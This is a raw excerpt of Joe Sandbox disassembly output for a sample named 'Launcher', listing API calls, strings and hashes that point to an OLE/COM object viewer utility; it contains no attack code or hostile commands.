                                                                                                                • Opcode ID: 478f1b947e1ffbe6da60d5c9a15c5376769a3d9eb62e9f39a99e581ff19daabb
                                                                                                                • Instruction ID: fec9000ea2f8185a95a89f0aa15d866ef071d93b190d0829766103e82a5fcd0b
                                                                                                                • Opcode Fuzzy Hash: 478f1b947e1ffbe6da60d5c9a15c5376769a3d9eb62e9f39a99e581ff19daabb
                                                                                                                • Instruction Fuzzy Hash: CDC1E5B1900218AFDB60DF64DC85BA9B7B8FB45305F0044E9FA0DA7261EB359E84DF19
                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00B61C9F
                                                                                                                • StringFromGUID2.OLE32(?,?,00000028,000002BC,00B64FBE,00000000,00B59ECC,?), ref: 00B61CCE
                                                                                                                • wsprintfW.USER32 ref: 00B61CE4
                                                                                                                • RegQueryValueW.ADVAPI32(80000000,?,?,000000A0), ref: 00B61D1A
                                                                                                                • lstrcpyW.KERNEL32(?,<no name>), ref: 00B61D30
                                                                                                                • RegQueryValueW.ADVAPI32(80000000,?,?,000000A0), ref: 00B61D9E
                                                                                                                • RegQueryValueW.ADVAPI32(80000002,?,?,000000A0), ref: 00B61DEE
                                                                                                                • CLSIDFromString.OLE32(?,?), ref: 00B61E06
                                                                                                                • #540.MFC42U ref: 00B61E18
                                                                                                                • #2810.MFC42U(?,Could not convert the CLSID of the %s interface viewer.,?), ref: 00B61E33
                                                                                                                • #800.MFC42U(?,00000000), ref: 00B61E4E
                                                                                                                • #540.MFC42U ref: 00B61E90
                                                                                                                • #2859.MFC42U(?,00000001), ref: 00B61EB6
                                                                                                                • #800.MFC42U(00000000,?,00000001), ref: 00B61ED3
                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000001,00B51990,?), ref: 00B61EEE
                                                                                                                • #2810.MFC42U(?,The %s interface viewer failed to load.,?), ref: 00B61F91
                                                                                                                Strings
                                                                                                                • Could not convert the CLSID of the %s interface viewer., xrefs: 00B61E2D
                                                                                                                • Interface\%s, xrefs: 00B61CDE
                                                                                                                • <no name>, xrefs: 00B61D24
                                                                                                                • The %s interface viewer failed to load., xrefs: 00B61F8B
                                                                                                                • Interface\%s\OLEViewerIViewerCLSID, xrefs: 00B61D57
                                                                                                                • Software\Microsoft\IViewers\Interface\%s\OLEViewerIViewerCLSID, xrefs: 00B61DAC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: QueryValue$#2810#540#800FromString$#2859CreateH_prolog3_Instancelstrcpywsprintf
                                                                                                                • String ID: <no name>$Could not convert the CLSID of the %s interface viewer.$Interface\%s$Interface\%s\OLEViewerIViewerCLSID$Software\Microsoft\IViewers\Interface\%s\OLEViewerIViewerCLSID$The %s interface viewer failed to load.
                                                                                                                • API String ID: 3373394939-4261977633
                                                                                                                • Opcode ID: e6902dd7b4b095e85483ce65d961a0be099b7b3887dfc67092520c77f6aade57
                                                                                                                • Instruction ID: fa4608278e0cf0f0f2545bda6331928c07afa15143e3bd3d6ab5b7b2bb8527eb
                                                                                                                • Opcode Fuzzy Hash: e6902dd7b4b095e85483ce65d961a0be099b7b3887dfc67092520c77f6aade57
                                                                                                                • Instruction Fuzzy Hash: 0C81F972A002289BDB21DB54CC89BEEB7B8FF09701F4405EAE909A7151DB759E84CF51
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00B69137: CoFreeUnusedLibraries.OLE32(00B64689,00000000,?), ref: 00B691A2
                                                                                                                • #540.MFC42U(F6B930CF,?,?,?,?,00B70AE8,000000FF,?,00B62E44,?,?,00000104), ref: 00B65050
                                                                                                                • CoGetClassObject.OLE32(000000FC,F6B930CF,00000000,00B59E3C,00000000,F6B930CF,?,?,?,?,00B70AE8,000000FF,?,00B62E44,?), ref: 00B6507D
                                                                                                                • CoGetClassObject.OLE32(000000FC,F6B930CF,00000000,00B59E3C,00000000,F6B930CF,?,?,?,?,00B70AE8,000000FF,?,00B62E44,?), ref: 00B6509D
                                                                                                                • #860.MFC42U(CoGetClassObject failed.,?,?,?,00B70AE8,000000FF,?,00B62E44,?), ref: 00B650B4
                                                                                                                • #1262.MFC42U(00000000,CoGetClassObject failed.,?,?,?,00B70AE8,000000FF,?,00B62E44,?), ref: 00B650BC
                                                                                                                • #860.MFC42U(CoGetClassObject succeeded, but punk was NULL.,?,?,?,00B70AE8,000000FF,?,00B62E44,?), ref: 00B650CF
                                                                                                                • #1262.MFC42U(00000000,CoGetClassObject succeeded, but punk was NULL.,?,?,?,00B70AE8,000000FF,?,00B62E44,?), ref: 00B650D7
                                                                                                                • #860.MFC42U(QueryInterface on class factory for IClassFactory failed.,?,?,?,00B70AE8,000000FF,?,00B62E44,?), ref: 00B65118
                                                                                                                • #1262.MFC42U(00000000,QueryInterface on class factory for IClassFactory failed.,?,?,?,00B70AE8,000000FF,?,00B62E44,?), ref: 00B65120
                                                                                                                • #860.MFC42U(CoGetClassObject succeeded, but pClassFactory was NULL.,?,?,?,00B70AE8,000000FF,?,00B62E44,?), ref: 00B65136
                                                                                                                • #1262.MFC42U(00000000,CoGetClassObject succeeded, but pClassFactory was NULL.,?,?,?,00B70AE8,000000FF,?,00B62E44,?), ref: 00B6513E
                                                                                                                • #860.MFC42U(IClassFactory::CreateInstance failed.,?,?,?,00B70AE8,000000FF,?,00B62E44,?), ref: 00B651A6
                                                                                                                • #1262.MFC42U(00000000,IClassFactory::CreateInstance failed.,?,?,?,00B70AE8,000000FF,?,00B62E44,?), ref: 00B651AE
                                                                                                                • #860.MFC42U(IClassFactory::CreateInstance succeeded, but punk was NULL.,?,?,?,00B70AE8,000000FF,?,00B62E44,?), ref: 00B651C4
                                                                                                                • #1262.MFC42U(00000000,IClassFactory::CreateInstance succeeded, but punk was NULL.,?,?,?,00B70AE8,000000FF,?,00B62E44,?), ref: 00B651CC
                                                                                                                • #800.MFC42U(?,?,?,00B70AE8,000000FF,?,00B62E44,?), ref: 00B65256
                                                                                                                Strings
                                                                                                                • CoGetClassObject succeeded, but pClassFactory was NULL., xrefs: 00B6512E
                                                                                                                • IClassFactory::CreateInstance succeeded, but punk was NULL., xrefs: 00B651BC
                                                                                                                • IClassFactory::CreateInstance failed., xrefs: 00B6519E
                                                                                                                • CoGetClassObject succeeded, but punk was NULL., xrefs: 00B650C7
                                                                                                                • QueryInterface on class factory for IClassFactory failed., xrefs: 00B65110
                                                                                                                • CoGetClassObject failed., xrefs: 00B650AC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1262#860$ClassObject$#540#800FreeLibrariesUnused
                                                                                                                • String ID: CoGetClassObject failed.$CoGetClassObject succeeded, but pClassFactory was NULL.$CoGetClassObject succeeded, but punk was NULL.$IClassFactory::CreateInstance failed.$IClassFactory::CreateInstance succeeded, but punk was NULL.$QueryInterface on class factory for IClassFactory failed.
                                                                                                                • API String ID: 3706085179-577247013
                                                                                                                • Opcode ID: f93c85b51e1f6072ac97edaa241e3e464e59e87bbdca88c7a168212556a0211b
                                                                                                                • Instruction ID: 32485f03d139d92ff6f430f4bb0ddb57835b0e1a3b59182d3046aaafee5285b7
                                                                                                                • Opcode Fuzzy Hash: f93c85b51e1f6072ac97edaa241e3e464e59e87bbdca88c7a168212556a0211b
                                                                                                                • Instruction Fuzzy Hash: 9F71A275900209DFCB10EF94D98ABAEBBF4FF18316F1041A5E911B72A1C778AA54CB61
                                                                                                                APIs
                                                                                                                • #4704.MFC42U ref: 00B5D024
                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00B5D030
                                                                                                                • SetCursor.USER32(00000000), ref: 00B5D037
                                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 00B5D06F
                                                                                                                • SendMessageW.USER32(?,00001061,00000001,?), ref: 00B5D0A0
                                                                                                                • RegOpenKeyW.ADVAPI32(80000000,CLSID,?), ref: 00B5D0B3
                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000100), ref: 00B5D0D0
                                                                                                                • wsprintfW.USER32 ref: 00B5D0F8
                                                                                                                • lstrcpyW.KERNEL32(?,00B52948,80000000,?,00B521A0,?,000001FE), ref: 00B5D13F
                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00B5D18E
                                                                                                                • SendMessageW.USER32(?,00001053,000000FF,00000002), ref: 00B5D1BE
                                                                                                                • SendMessageW.USER32(?,0000104C,00000000,00000001), ref: 00B5D1F3
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00B5D205
                                                                                                                • SetCursor.USER32(00000000), ref: 00B5D20C
                                                                                                                • SendMessageW.USER32(?,0000104B,00000000,00000001), ref: 00B5D23B
                                                                                                                • SendMessageW.USER32(?,0000104C,00000000,00000009), ref: 00B5D263
                                                                                                                • #5977.MFC42U ref: 00B5D26F
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00B5D27A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Cursor$Load$#4704#5977CloseEnumOpenlstrcpywsprintf
                                                                                                                • String ID: CLSID$CLSID\%s$Class Name
                                                                                                                • API String ID: 3330777091-3884686139
                                                                                                                • Opcode ID: e210199a8428ae54621c4eb47bc7178381baf45f74624995b023d5fb92af2564
                                                                                                                • Instruction ID: 9c4e941e318fd44c55b84d145abffb27bdc740af29626e567904a5ee7a618c3a
                                                                                                                • Opcode Fuzzy Hash: e210199a8428ae54621c4eb47bc7178381baf45f74624995b023d5fb92af2564
                                                                                                                • Instruction Fuzzy Hash: F9611FB1900218AFEB219F60DC89FDAB7BAFB84305F1005E5E61DA2191DB765ED48F50
                                                                                                                APIs
                                                                                                                • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,00000000,?,?,?,?,00B6CB28,00000000,00000000,?), ref: 00B6CB71
                                                                                                                • GetLastError.KERNEL32(?,?,?,00B6CB28,00000000,00000000,?,?,?,00B6CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B6CB77
                                                                                                                • malloc.MSVCRT ref: 00B6CB9D
                                                                                                                • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,?,00B6CB28,00000000,00000000,?,?,?,00B6CE14,00000000,00000000), ref: 00B6CBC1
                                                                                                                • GetLastError.KERNEL32(?,?,00B6CB28,00000000,00000000,?,?,?,00B6CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B6CBCB
                                                                                                                • free.MSVCRT ref: 00B6CD14
                                                                                                                • free.MSVCRT ref: 00B6CD20
                                                                                                                • free.MSVCRT ref: 00B6CD31
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: free$ErrorInformationLastToken$malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 3900411180-0
                                                                                                                • Opcode ID: dc98e24dae761b4b00fc6aaf22f65141c04d7428f324bb1bddccd43d5a50f58c
                                                                                                                • Instruction ID: b70bf39f2c94df10301f1b3308c17bf94d2620a28f89505517972d87b52b5897
                                                                                                                • Opcode Fuzzy Hash: dc98e24dae761b4b00fc6aaf22f65141c04d7428f324bb1bddccd43d5a50f58c
                                                                                                                • Instruction Fuzzy Hash: F951D57690012AEFCB159FA4DC48A7A7EF4FF45352B2241B6FD49E7160DB388D409A90
                                                                                                                APIs
                                                                                                                • #4493.MFC42U ref: 00B60E90
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00B61B2B
                                                                                                                • #540.MFC42U(00000044,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B61B35
                                                                                                                • #540.MFC42U(00000044,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B61B41
                                                                                                                • #4155.MFC42U(00000004,00000044,00000000,?,?), ref: 00B61B4F
                                                                                                                • #4155.MFC42U(00000005,00000004,00000044,00000000,?,?), ref: 00B61B59
                                                                                                                • #540.MFC42U(00000005,00000004,00000044,00000000,?,?), ref: 00B61B61
                                                                                                                • #3865.MFC42U(?,00000005,00000004,00000044,00000000,?,?), ref: 00B61B77
                                                                                                                • #2970.MFC42U(00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00B61B8C
                                                                                                                • #2910.MFC42U(000000FF,00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00B61B99
                                                                                                                • #3792.MFC42U(000000FF,00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00B61BA6
                                                                                                                • #3792.MFC42U(00000000,000000FF,00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00B61BB8
                                                                                                                • wsprintfW.USER32 ref: 00B61BE8
                                                                                                                • #5568.MFC42U(000000FF), ref: 00B61BF6
                                                                                                                • #6399.MFC42U(?,?,?,000000FF), ref: 00B61C09
                                                                                                                • #800.MFC42U(?,?,?,000000FF), ref: 00B61C11
                                                                                                                • #800.MFC42U(?,?,?,000000FF), ref: 00B61C19
                                                                                                                • #800.MFC42U(?,?,?,000000FF), ref: 00B61C21
                                                                                                                Strings
                                                                                                                • %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, xrefs: 00B61BE2
                                                                                                                • ,, xrefs: 00B61B70
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #540#800$#3792#4155$#2910#2970#3865#4493#5568#6399H_prolog3_wsprintf
                                                                                                                • String ID: %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d$,
                                                                                                                • API String ID: 3591584436-2100854449
                                                                                                                • Opcode ID: 7b27f3b62667931fb2917190745c45f2d242423c12be022c937629d1cb74ef31
                                                                                                                • Instruction ID: 1c01cedbb365a6d65e43a59da0a4d703dc2be9a4225107907a6191dba07b313b
                                                                                                                • Opcode Fuzzy Hash: 7b27f3b62667931fb2917190745c45f2d242423c12be022c937629d1cb74ef31
                                                                                                                • Instruction Fuzzy Hash: 8B313D36E10108AACF05EBE4CC92EEDBBB5BF58300F4440A5F611771A2DF795A1ADB51
                                                                                                                APIs
                                                                                                                • #540.MFC42U(?,?), ref: 00B66CF1
                                                                                                                • #2810.MFC42U(?,IMoniker::BindToObject failed on the file moniker created from ( "%s" ).,00000000,?,?), ref: 00B66D15
                                                                                                                • #800.MFC42U(?,00000000), ref: 00B66D39
                                                                                                                  • Part of subcall function 00B65010: #540.MFC42U(F6B930CF,?,?,?,?,00B70AE8,000000FF,?,00B62E44,?,?,00000104), ref: 00B65050
                                                                                                                  • Part of subcall function 00B65010: CoGetClassObject.OLE32(000000FC,F6B930CF,00000000,00B59E3C,00000000,F6B930CF,?,?,?,?,00B70AE8,000000FF,?,00B62E44,?), ref: 00B6507D
                                                                                                                  • Part of subcall function 00B65010: #860.MFC42U(CoGetClassObject failed.,?,?,?,00B70AE8,000000FF,?,00B62E44,?), ref: 00B650B4
                                                                                                                  • Part of subcall function 00B65010: #1262.MFC42U(00000000,CoGetClassObject failed.,?,?,?,00B70AE8,000000FF,?,00B62E44,?), ref: 00B650BC
                                                                                                                  • Part of subcall function 00B65010: #860.MFC42U(CoGetClassObject succeeded, but punk was NULL.,?,?,?,00B70AE8,000000FF,?,00B62E44,?), ref: 00B650CF
                                                                                                                  • Part of subcall function 00B65010: #1262.MFC42U(00000000,CoGetClassObject succeeded, but punk was NULL.,?,?,?,00B70AE8,000000FF,?,00B62E44,?), ref: 00B650D7
                                                                                                                  • Part of subcall function 00B65010: #860.MFC42U(QueryInterface on class factory for IClassFactory failed.,?,?,?,00B70AE8,000000FF,?,00B62E44,?), ref: 00B65118
                                                                                                                  • Part of subcall function 00B65010: #1262.MFC42U(00000000,QueryInterface on class factory for IClassFactory failed.,?,?,?,00B70AE8,000000FF,?,00B62E44,?), ref: 00B65120
                                                                                                                  • Part of subcall function 00B65010: #860.MFC42U(CoGetClassObject succeeded, but pClassFactory was NULL.,?,?,?,00B70AE8,000000FF,?,00B62E44,?), ref: 00B65136
                                                                                                                  • Part of subcall function 00B65010: #1262.MFC42U(00000000,CoGetClassObject succeeded, but pClassFactory was NULL.,?,?,?,00B70AE8,000000FF,?,00B62E44,?), ref: 00B6513E
                                                                                                                • RegOpenKeyW.ADVAPI32(80000000,Interface,?), ref: 00B66E1F
                                                                                                                • malloc.MSVCRT ref: 00B66E77
                                                                                                                • malloc.MSVCRT ref: 00B66EBA
                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000050), ref: 00B66F38
                                                                                                                • CLSIDFromString.OLE32(00000000,00000000), ref: 00B66F76
                                                                                                                • StringFromGUID2.OLE32(00000000,?,00000100), ref: 00B67148
                                                                                                                • lstrcpyW.KERNEL32(?,00000000), ref: 00B6717B
                                                                                                                • RegQueryValueW.ADVAPI32(?,?,?,00000200), ref: 00B671A6
                                                                                                                • wsprintfW.USER32 ref: 00B671D9
                                                                                                                • free.MSVCRT ref: 00B6733B
                                                                                                                • free.MSVCRT ref: 00B6734A
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00B67389
                                                                                                                Strings
                                                                                                                • Interface, xrefs: 00B66E15
                                                                                                                • ', xrefs: 00B66DCF
                                                                                                                • %s <no name>, xrefs: 00B671CD
                                                                                                                • IMoniker::BindToObject failed on the file moniker created from ( "%s" )., xrefs: 00B66D09
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1262#860$#540FromStringfreemalloc$#2810#800ClassCloseEnumObjectOpenQueryValuelstrcpywsprintf
                                                                                                                • String ID: %s <no name>$'$IMoniker::BindToObject failed on the file moniker created from ( "%s" ).$Interface
                                                                                                                • API String ID: 3715769521-149418688
                                                                                                                • Opcode ID: 4d3999c9ea350ec06492be6b1843d0963eb29e1133e6991e3b8deb512250ad4b
                                                                                                                • Instruction ID: d4466f5fd667641990223b1b3730adef49451b29d62ab3d3ba4826c17b999e8a
                                                                                                                • Opcode Fuzzy Hash: 4d3999c9ea350ec06492be6b1843d0963eb29e1133e6991e3b8deb512250ad4b
                                                                                                                • Instruction Fuzzy Hash: FB22B5B1905228CFDB64DB14CD94B99B7F9FB44305F1040E9E60AA7292DB789EC5CF18
                                                                                                                APIs
                                                                                                                • #1662.MFC42U(F6B930CF), ref: 00B64326
                                                                                                                • #858.MFC42U(?), ref: 00B64531
                                                                                                                • #540.MFC42U ref: 00B6455F
                                                                                                                • StringFromGUID2.OLE32(?,?,00000028,?,00B59EDC), ref: 00B6459A
                                                                                                                • lstrcpyW.KERNEL32(?,00000000), ref: 00B645B1
                                                                                                                • #2810.MFC42U(?,CLSID\%s,?,?), ref: 00B645E0
                                                                                                                • lstrcpyW.KERNEL32(?,?), ref: 00B645F3
                                                                                                                • RegQueryValueW.ADVAPI32(80000000,00000000,?,00000100), ref: 00B64618
                                                                                                                • #2810.MFC42U(?,%s (%s),?,?), ref: 00B64636
                                                                                                                • #2810.MFC42U(?,00B5572C,?,?,00B59EDC), ref: 00B64651
                                                                                                                • #540.MFC42U(00000000,?), ref: 00B646F4
                                                                                                                • #2810.MFC42U(?,Could not add item to tree view. Internal OLEViewer error.,00000000,?), ref: 00B64709
                                                                                                                • #800.MFC42U(?,80004005,00000000,?), ref: 00B6472C
                                                                                                                • #2644.MFC42U(00000000,?), ref: 00B64737
                                                                                                                • #800.MFC42U(00000000,?), ref: 00B6476E
                                                                                                                Strings
                                                                                                                • %s (%s), xrefs: 00B6462A
                                                                                                                • Could not add item to tree view. Internal OLEViewer error., xrefs: 00B646FD
                                                                                                                • CLSID\%s, xrefs: 00B645D4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2810$#540#800lstrcpy$#1662#2644#858FromQueryStringValue
                                                                                                                • String ID: %s (%s)$CLSID\%s$Could not add item to tree view. Internal OLEViewer error.
                                                                                                                • API String ID: 2368693756-676685266
                                                                                                                • Opcode ID: ed92f01e384c850b0d4bc491dba57a99362f70598c4bf0a23467082ae1b51ef2
                                                                                                                • Instruction ID: dff8f51d60b0d261f800ce708f0c9e2760661bc489a054965e69b100eaa69428
                                                                                                                • Opcode Fuzzy Hash: ed92f01e384c850b0d4bc491dba57a99362f70598c4bf0a23467082ae1b51ef2
                                                                                                                • Instruction Fuzzy Hash: EED1B175901229DFDB64EF64CC99B9DB7F9BB48301F1040EAE809A72A1DB749E84CF50
                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00B5CB20
                                                                                                                • #540.MFC42U(00000264,00B5DF79), ref: 00B5CB33
                                                                                                                • StringFromGUID2.OLE32(?,?,00000028,00000264,00B5DF79), ref: 00B5CB5F
                                                                                                                • #861.MFC42U(?), ref: 00B5CBEC
                                                                                                                • lstrcmpW.KERNEL32(?,Interactive User,?,?,?,?), ref: 00B5CC3D
                                                                                                                • #6195.MFC42U(00B521A0,?,?,?,?), ref: 00B5CC4E
                                                                                                                • #2634.MFC42U(00000000,00B521A0,?,?,?,?), ref: 00B5CC58
                                                                                                                • #6195.MFC42U(?,?,?,?,?), ref: 00B5CC69
                                                                                                                • #2634.MFC42U(00000001,?,?,?,?,?), ref: 00B5CC72
                                                                                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00B5CCA3
                                                                                                                • #6330.MFC42U(00000000,?,?,?,?), ref: 00B5CCAC
                                                                                                                • #800.MFC42U(00000000,?,?,?,?), ref: 00B5CCB7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2634#6195$#540#6330#800#861FromH_prolog3_MessageSendStringlstrcmp
                                                                                                                • String ID: ActivateAtStorage$Interactive User$RemoteServerName$RunAs
                                                                                                                • API String ID: 3025489585-4117267133
                                                                                                                • Opcode ID: 9e7388ca6330b1fabd1d678eb00dd058e937a57fe0ef3be30f8c387044eb4feb
                                                                                                                • Instruction ID: bd9d6e234287a3e1f714d9c5d7f13c6c00569a7924e88bd158e1cf998d98053b
                                                                                                                • Opcode Fuzzy Hash: 9e7388ca6330b1fabd1d678eb00dd058e937a57fe0ef3be30f8c387044eb4feb
                                                                                                                • Instruction Fuzzy Hash: DB4186319447199ADB11EF24CD86BEB77F9AF46701F0000E9BD09AB291DBB59E488B50
                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 00B6D924
                                                                                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000409,?,00000000,00000000,00000010,00B6B9B7,?,00000000,00000000,00000000), ref: 00B6D942
                                                                                                                • #2810.MFC42U(?,%s %s,?,00000000,?), ref: 00B6D96C
                                                                                                                • #922.MFC42U(?,?,?,?,?,?,?), ref: 00B6D97F
                                                                                                                • #858.MFC42U(00000000,?,?,?,?,?,?,?), ref: 00B6D98C
                                                                                                                • #800.MFC42U(00000000,?,?,?,?,?,?,?), ref: 00B6D997
                                                                                                                • LocalFree.KERNEL32(?,00000000,?,?,?,?,?,?,?), ref: 00B6D99F
                                                                                                                • #1197.MFC42U(?,00000000,00000000,?,?,?,?), ref: 00B6D9AA
                                                                                                                • #540.MFC42U ref: 00B6D94F
                                                                                                                  • Part of subcall function 00B6DCEB: wsprintfW.USER32 ref: 00B6DD1D
                                                                                                                • #540.MFC42U ref: 00B6D9B7
                                                                                                                • #2810.MFC42U(?,<No system message defined> %s,00000000,?), ref: 00B6D9D5
                                                                                                                • #922.MFC42U(?,?,?,?,?,?), ref: 00B6D9E8
                                                                                                                • #858.MFC42U(00000000,?,?,?,?,?,?), ref: 00B6D9F5
                                                                                                                • #800.MFC42U(00000000,?,?,?,?,?,?), ref: 00B6DA01
                                                                                                                • #1197.MFC42U(?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00B6DA0B
                                                                                                                • #800.MFC42U(?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00B6DA13
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #800$#1197#2810#540#858#922$FormatFreeH_prolog3LocalMessagewsprintf
                                                                                                                • String ID: %s %s$<No system message defined> %s
                                                                                                                • API String ID: 3659733580-1395831093
                                                                                                                • Opcode ID: 49e235f0b7e683e05df4ee24290b94273c3bbb5ee1ba8131d8462d4cf86b2c99
